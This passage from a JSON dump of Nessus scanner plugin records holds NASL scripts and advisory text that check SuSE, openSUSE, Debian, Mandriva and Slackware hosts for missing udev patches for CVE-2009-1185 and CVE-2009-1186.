extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"udev\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:54", "description": "This update fixes a local privilege escalation in udev.\n\n - udev did not check the origin of the netlink messages. A local attacker could fake device create events and so gain root privileges. (CVE-2009-1185)\n\nIt also fixes three bugs :\n\n - Fixup persistent symlinks for tapes. (bnc#446534)\n\n - Fixup broken ATA compability links. (bnc#447995)\n\n - Add by-path links for tapes (bnc#478132)", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : udev (ZYPP Patch Number 6153)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_UDEV-6153.NASL", "href": "https://www.tenable.com/plugins/nessus/41593", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41593);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n\n script_name(english:\"SuSE 10 Security Update : udev (ZYPP Patch Number 6153)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a local privilege escalation in udev.\n\n - udev did not check the origin of the netlink messages. A\n local attacker could fake device create events and so\n gain root privileges. (CVE-2009-1185)\n\nIt also fixes three bugs :\n\n - Fixup persistent symlinks for tapes. (bnc#446534)\n\n - Fixup broken ATA compability links. (bnc#447995)\n\n - Add by-path links for tapes (bnc#478132)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1185.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6153.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"udev-085-30.52\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"udev-085-30.52\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:33", "description": "This update fixes a local privilege escalation in udev.\n\nCVE-2009-1185: udev did not check the origin of the netlink messages.\nA local attacker could fake device create events and so gain root privileges.", "cvss3": {}, "published": "2009-07-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libudev-devel (libudev-devel-768)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libvolume_id", "p-cpe:/a:novell:opensuse:libvolume_id-devel", "p-cpe:/a:novell:opensuse:udev", "cpe:/o:novell:opensuse:11.0"], "id": "SUSE_11_0_LIBUDEV-DEVEL-090414.NASL", "href": "https://www.tenable.com/plugins/nessus/40050", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libudev-devel-768.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40050);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n\n script_name(english:\"openSUSE Security Update : libudev-devel (libudev-devel-768)\");\n script_summary(english:\"Check for the libudev-devel-768 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a local privilege escalation in udev.\n\nCVE-2009-1185: udev did not check the origin of the netlink messages.\nA local attacker could fake device create events and so gain root\nprivileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=493158\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libudev-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvolume_id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvolume_id-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libvolume_id-120-13.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libvolume_id-devel-120-13.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"udev-120-13.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"udev\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:06", "description": "Sebastian Kramer discovered two vulnerabilities in udev, the /dev and hotplug management daemon.\n\n - CVE-2009-1185 udev does not check the origin of NETLINK messages, allowing local users to gain root privileges.\n\n - CVE-2009-1186 udev suffers from a buffer overflow condition in path encoding, potentially allowing arbitrary code execution.", "cvss3": {}, "published": "2009-04-17T00:00:00", "type": "nessus", "title": "Debian DSA-1772-1 : udev - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:udev", "cpe:/o:debian:debian_linux:4.0", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-1772.NASL", "href": "https://www.tenable.com/plugins/nessus/36172", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1772. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36172);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_bugtraq_id(34536, 34539);\n script_xref(name:\"DSA\", value:\"1772\");\n\n script_name(english:\"Debian DSA-1772-1 : udev - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Kramer discovered two vulnerabilities in udev, the /dev and\nhotplug management daemon.\n\n - CVE-2009-1185\n udev does not check the origin of NETLINK messages,\n allowing local users to gain root privileges.\n\n - CVE-2009-1186\n udev suffers from a buffer overflow condition in path\n encoding, potentially allowing arbitrary code execution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1772\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the udev package.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 0.105-4etch1.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 0.125-7+lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"libvolume-id-dev\", reference:\"0.105-4etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libvolume-id0\", reference:\"0.105-4etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"udev\", reference:\"0.105-4etch1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libvolume-id-dev\", reference:\"0.125-7+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libvolume-id0\", reference:\"0.125-7+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"udev\", reference:\"0.125-7+lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:43", "description": "Security vulnerabilities have been identified and fixed in udev.\n\nudev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space (CVE-2009-1185).\n\nBuffer overflow in the util_path_encode function in udev/lib/libudev-util.c in udev before 1.4.1 allows local users to cause a denial of service (service outage) via vectors that trigger a call with crafted arguments (CVE-2009-1186).\n\nThe updated packages have been patched to prevent this.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0 customers", "cvss3": {}, "published": "2009-05-01T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : udev (MDVSA-2009:103-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64volume_id0", "p-cpe:/a:mandriva:linux:lib64volume_id0-devel", "p-cpe:/a:mandriva:linux:libvolume_id0", "p-cpe:/a:mandriva:linux:libvolume_id0-devel", "p-cpe:/a:mandriva:linux:udev", "p-cpe:/a:mandriva:linux:udev-doc", "p-cpe:/a:mandriva:linux:udev-tools", "cpe:/o:mandriva:linux:2008.0"], "id": "MANDRIVA_MDVSA-2009-103.NASL", "href": "https://www.tenable.com/plugins/nessus/38658", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:103. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38658);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_bugtraq_id(34536, 34539);\n script_xref(name:\"MDVSA\", value:\"2009:103-1\");\n\n script_name(english:\"Mandriva Linux Security Advisory : udev (MDVSA-2009:103-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security vulnerabilities have been identified and fixed in udev.\n\nudev before 1.4.1 does not verify whether a NETLINK message originates\nfrom kernel space, which allows local users to gain privileges by\nsending a NETLINK message from user space (CVE-2009-1185).\n\nBuffer overflow in the util_path_encode function in\nudev/lib/libudev-util.c in udev before 1.4.1 allows local users to\ncause a denial of service (service outage) via vectors that trigger a\ncall with crafted arguments (CVE-2009-1186).\n\nThe updated packages have been patched to prevent this.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64volume_id0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64volume_id0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libvolume_id0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libvolume_id0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:udev-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:udev-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64volume_id0-114-7.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64volume_id0-devel-114-7.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libvolume_id0-114-7.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libvolume_id0-devel-114-7.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"udev-114-7.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"udev-doc-114-7.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"udev-tools-114-7.1mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:07", "description": "New udev packages are available for Slackware 10.2, 11.0, 12.0, 12.1, 12.2, and -current to fix security issues. The udev packages in Slackware 10.2, 11.0, 12.0, 12.1, 12.2, and -current contained a local root hole vulnerability:\nhttps://vulners.com/cve/CVE-2009-1185 The udev packages in Slackware 12.0, 12.1, 12.2, and -current had an integer overflow which could result in a denial of service:\nhttps://vulners.com/cve/CVE-2009-1186 Note that udev is only used with 2.6 kernels, which are not used by default with Slackware 10.2 and 11.0.", "cvss3": {}, "published": "2009-04-21T00:00:00", "type": "nessus", "title": "Slackware 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / current : udev (SSA:2009-111-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:udev", "cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.1", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:10.2", "cpe:/o:slackware:slackware_linux:11.0"], "id": "SLACKWARE_SSA_2009-111-01.NASL", "href": "https://www.tenable.com/plugins/nessus/36186", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2009-111-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36186);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_bugtraq_id(34536, 34539);\n script_xref(name:\"SSA\", value:\"2009-111-01\");\n\n script_name(english:\"Slackware 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / current : udev (SSA:2009-111-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New udev packages are available for Slackware 10.2, 11.0, 12.0, 12.1,\n12.2, and -current to fix security issues. The udev packages in\nSlackware 10.2, 11.0, 12.0, 12.1, 12.2, and -current contained a local\nroot hole vulnerability:\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 The udev\npackages in Slackware 12.0, 12.1, 12.2, and -current had an integer\noverflow which could result in a denial of service:\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1186 Note that\nudev is only used with 2.6 kernels, which are not used by default with\nSlackware 10.2 and 11.0.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.446399\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?42006a3b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected udev package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"10.2\", pkgname:\"udev\", pkgver:\"064\", pkgarch:\"i486\", pkgnum:\"4_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"11.0\", pkgname:\"udev\", pkgver:\"097\", pkgarch:\"i486\", pkgnum:\"11_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"udev\", pkgver:\"111\", pkgarch:\"i486\", pkgnum:\"6_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"udev\", pkgver:\"118\", pkgarch:\"i486\", pkgnum:\"4_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"udev\", pkgver:\"141\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"udev\", pkgver:\"141\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:06", "description": "The remote host is affected by the vulnerability described in GLSA-200904-18 (udev: Multiple vulnerabilities)\n\n Sebastian Krahmer of SUSE discovered the 